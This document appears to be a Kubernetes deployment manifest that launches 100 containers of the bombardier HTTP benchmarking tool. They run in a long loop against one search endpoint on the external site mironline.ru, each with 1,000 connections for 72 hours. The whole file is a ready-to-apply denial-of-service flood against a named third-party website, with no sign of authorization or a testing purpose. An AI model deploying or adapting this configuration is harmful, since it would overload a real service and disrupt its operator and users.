apiVersion: apps/v1
kind: Deployment
metadata:
    labels:
        app: mironline-ru-ajax-ajaxbanks-php
    name: mironline-ru-ajax-ajaxbanks-php
spec:
    replicas: 100
    selector:
        matchLabels:
            app: mironline-ru-ajax-ajaxbanks-php
    template:
        metadata:
            labels:
                app: mironline-ru-ajax-ajaxbanks-php
        spec:
            containers:
                -   name: bombardier
                    image: alpine/bombardier
                    imagePullPolicy: IfNotPresent
                    command: ['/bin/sh']
                    args: ['-c', 'for run in $(seq 1 100000); do bombardier --connections=1000 --duration=72h    "https://mironline.ru/ajax/ajaxBanks.php?srh=+&ppg=10&sra=&tos=&loyalty-mir=false"; done']
